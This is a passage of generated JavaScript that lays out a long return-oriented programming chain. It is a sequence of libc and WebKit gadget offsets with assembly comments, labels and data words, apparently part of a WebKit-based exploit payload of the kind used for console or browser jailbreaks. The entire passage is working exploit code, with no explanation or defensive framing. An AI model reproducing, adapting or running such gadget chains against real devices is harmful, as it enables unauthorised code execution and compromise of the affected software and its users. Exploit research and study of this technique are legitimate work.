ropchain+268192, //L5033
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5033:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+268248, //L5034
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5034:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+268320, //L5037
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5037:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+268376, //L5038
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5038:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+271584, //L5040
//L4981:
libc_base+764760, //pop rsi
ropchain+268480, //L5041
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5041:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5043:
db([96, 0]); // 0x60
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+268600, //L5046
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+268584, //L5044
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5044:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5046:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+268776, //L5049
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+268792, //L5050
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+268744, //L5047
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+268760, //L5048
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5047:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5048:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5049:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5050:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+268888, //L5052
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+268872, //L5051
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5051:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5052:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5053:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L5054:
db([3, 0]); // 0x3
set_gadget(libc_base+763368,); //pop rcx
//L5055:
db([3, 0]); // 0x3
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+269088, //L5057
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5057:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+269144, //L5058
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5058:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+269280, //L5062
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+269264, //L5061
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5060:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L5061:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5062:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+269416, //L5065
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+269448, //L5067
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+269400, //L5064
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5064:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5065:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5066:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5067:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+269560, //L5068+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+269552, //L5068
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L5068:
db([0, 0]); // 0x0
set_gadgets([
ropchain+269576, //L5068+24
ropchain+271584, //L5063
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+269616, //L5069
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L5069:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5070:
db([32, 0]); // 0x20
set_gadget(libc_base+144605,); //pop rdi
//L5071:
db([32, 0]); // 0x20
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+269808, //L5075
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+269776, //L5073
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+269792, //L5074
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5072:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L5073:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5074:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5075:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+269864, //L5077
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L5077:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+269992, //L5079
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+270008, //L5080
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+269976, //L5078
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5078:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5079:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5080:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+270104, //L5082
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+270088, //L5081
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5081:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5082:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+270184, //L5083
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5083:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5085:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+270304, //L5088
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+270288, //L5086
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5086:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5088:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+270448, //L5091
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+270416, //L5089
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+270432, //L5090
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5089:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5090:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5091:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+270520, //L5093
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5093:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+270576, //L5094
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5094:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+270656, //L5096
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5096:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5098:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+270776, //L5101
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+270760, //L5099
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5099:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5101:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+270920, //L5104
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+270888, //L5102
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+270904, //L5103
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5102:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5103:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5104:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+271008, //L5106
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L5105:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L5106:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+271064, //L5107
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5107:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5109:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+271144, //L5111
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5111:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+271248, //L5112
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+271264, //L5113
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5112:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5113:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+271352, //L5115
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5115:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+271408, //L5116
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5116:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+271480, //L5119
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5119:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+271536, //L5120
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5120:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L5063:
//L5040:
//L4958:
//L4869:
libc_base+764760, //pop rsi
ropchain+271624, //L5122
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5122:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5124:
db([96, 0]); // 0x60
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+271744, //L5127
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+271728, //L5125
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5125:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5127:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+271920, //L5130
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+271936, //L5131
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+271888, //L5128
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+271904, //L5129
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5128:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5129:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5130:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5131:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+272032, //L5133
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+272016, //L5132
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5132:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5133:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+272112, //L5134
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5134:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5136:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+272232, //L5139
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+272216, //L5137
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5137:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5139:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+272408, //L5142
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+272424, //L5143
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+272376, //L5140
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+272392, //L5141
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5140:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L5141:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5142:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5143:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+272520, //L5145
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+272504, //L5144
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L5144:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5145:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+272600, //L5146
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5146:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5148:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+272720, //L5151
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+272704, //L5149
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5149:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5151:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+272864, //L5154
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+272832, //L5152
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+272848, //L5153
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5152:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5153:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5154:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+272944, //L5155
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5155:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5157:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+273064, //L5160
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+273048, //L5158
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5158:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5160:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+273208, //L5163
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+273176, //L5161
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+273192, //L5162
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5161:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5162:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5163:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+273288, //L5164
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5164:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5166:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+273408, //L5169
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+273392, //L5167
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5167:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5169:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+273552, //L5172
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+273520, //L5170
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+273536, //L5171
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5170:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5171:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5172:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+273632, //L5173
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5173:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5175:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+273752, //L5178
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+273736, //L5176
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5176:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5178:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+273896, //L5181
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+273864, //L5179
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+273880, //L5180
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L5179:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5180:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L5181:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+273976, //L5182
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L5182:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L5184:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+274096, //L5187
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+274080, //L5185
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L5185:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L5187:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+274240, //L5190
webkit_base+660161, //mov [rsi], rax ; mov al, 1
